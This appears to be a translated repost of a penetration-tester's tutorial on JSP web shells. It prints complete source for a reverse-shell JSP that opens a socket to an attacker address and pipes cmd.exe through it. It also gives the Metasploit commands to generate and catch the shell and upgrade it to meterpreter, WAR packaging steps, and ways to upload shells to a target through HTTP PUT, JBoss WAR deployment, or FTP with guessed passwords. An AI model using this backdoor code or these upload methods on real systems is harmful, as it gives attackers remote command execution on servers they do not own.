Foreign Daniel teaches you how to use JSP Shell

What is WebShell?

WebShell is a command execution environment that exists in the form of web files such as asp, php, jsp, or cgi. It can also be called a web browser backdoor. After hackers intrude into a website, they usually mix these asp or php backdoor files with normal webpage files under the WEB directory of the website server, and then they can use the browser...

Today, more and more websites are developed using JSP, and many big companies use this architecture in their data centers. In my penetration experience, the main way to win a JSP website is to upload Shell to execute commands. In the following article, I will give two examples of JSP shell code and several common methods for uploading shell.

JSP Shell

For those who are not familiar with Web shells, the JSP Shell I mentioned above is a piece of "Java Server Page" code that allows any command to be executed on the Server. Generally, Shell accepts the commands to be executed through an HTML from statement. Next, I will give the basic Shell code for each example. I personally prefer Metasploit JSP shells, because it has good stability and refreshing interface.

Basic JSP shell

This is the simplest JSP Shell, which is used as follows.

(1) Save it as cmd. jsp and upload it to the server.

(2) access this page and execute the command.

Metasploit JSP Shell

It takes about six steps to use Metasploit JSP Shell in the attack.

(1) Use msfpayload to create a cmd. jsp

(2) Upload cmd. jsp to the server

(3) Run Metasploit multi-handler

(4) Access cmd. jsp

(5) obtain the shell

(6) upgrade to meterpreter shell for windows

You can use the following command to create a JSP Shell. LHOST represents the address of your host.

ruby C:\framework\msf3\msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.100.110 LPORT=53 R > cmd.jsp

After the preceding command is successfully executed, Metasploit generates the source code of cmd. jsp. In some cases, you may need to modify some of the variables to bypass firewall detection.

 
 

  
  
<%@page import="java.lang.*"%>   
  
  
<%@page import="java.util.*"%>   
  
  
<%@page import="java.io.*"%>  
  
  
 <%@page import="java.net.*"%>  
  
  
 <% class StreamConnector extends Thread  
  
  
 {   
  
  
InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os )   
  
  
{   
  
  
this.is = is;   
  
  
this.os = os;   
  
  
}   
  
  
public void run()  
  
  
{   
  
  
BufferedReader in = null;  
  
  
BufferedWriter out = null;  
  
  
try { in = new BufferedReader( new InputStreamReader( this.is ) );  
  
  
out = new BufferedWriter( new OutputStreamWriter( this.os ) );  
  
  
char buffer[] = new char[8192];  
  
  
int length;  
  
  
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )   
  
  
{   
  
  
out.write( buffer, 0, length );   
  
  
out.flush();  
  
  
}  
  
  
}  
  
  
catch( Exception e ){} try { if( in != null ) in.close();  
  
  
 if( out != null ) out.close();   
  
  
}   
  
  
catch( Exception e ){}  
  
  
 }   
  
  
} try { Socket socket = new Socket( "192.168.100.110", 53 );  
  
  
 Process process = Runtime.getRuntime().exec( "cmd.exe" );  
  
  
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  
  
  
 ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();   
  
  
}   
  
  
catch( Exception e ) {}  
  
  
 %> 
 
 

Then upload the cmd. jsp file to the target server. Assume that the uploaded address is http://www.victim.com/developer.jspand starts to use metasploit multi handler. Open msfconsole and run the following command.

use exploit/multi/handler setg LHOST 192.168.100.110 setg LPORT 53 setg PAYLOAD java/jsp_shell_reverse_tcp setg SHELL cmd.exe exploit –j -z

The last access to the http://www.victim.com/cmd.jsp, msfconsole will be pulled back from the link.

You can access this shell using the following commands:

sessions –I 1

If the target host is a windows host, use the following command to upgrade shell to a meter-preter shell.

sessions –U 1

Package JSP Shells

In some cases, you need to package cmd. jsp into a WAR file (such as JBoss). In windows, the following steps are required.

(1) install JDK

(2) create a WEB-INF directory

(3) enter the following content in WEB-INF/web. xml

 
 

  
  
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
  
  
 xsi:schemalocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4">  
  
  
<servlet-name>Command</servlet-name>   
  
  
<jsp-file>/cmd.jsp</jsp-file>  
  
  
</web-app> 
 
 

(4) use the following command to package jsp files into jar packages.

"C:\Program Files (x86)\Java\jdk1.6.0_26\bin\jar.exe" cvf cmd.war WEB-INF cmd.jsp

Shell upload

Use the PUT Method

The PUT method is an extended HTTP protocol that allows users to upload files to the server. This vulnerability was very popular a long time ago.

Almost all scanning tools can scan the vulnerability or use tools such as ncat to find the vulnerability. I prefer

Using burp to detect this vulnerability requires the following steps.

(1) Go to the repeater tab

(2) construct the following file header

PUT /path/cmd.jsp HTTP/1.1 Host: Content-Length: 0

(3) enter the JSP shell code after two consecutive carriage returns under the file header.

(4) Submit the constructed package under burp.

Upload Method

In general, websites have strict control over the types of uploaded files, but attackers still have several methods to bypass them. This is not detailed here.

Publish WAR files

Some server software uses WAR, some of which provide interfaces for users to upload WAR files. Some allow users to use some external sources. Josh Abraham wrote some jBoss metasploit exploits, called jboss_maindeployer. There is also a good paper for jBoss attacks.

File Sharing

Sometimes, the home directory of the website will be deployed on the ftp server. If you can guess the password or use the default password for ftp. You can use ftp to upload the shell.

In fact, this is a popular science article. Finally, the description of the file upload technique is lengthy and can be deleted.

Address: https://www.netspi.com/blog/entryid/126/hacking-with-jsp-shells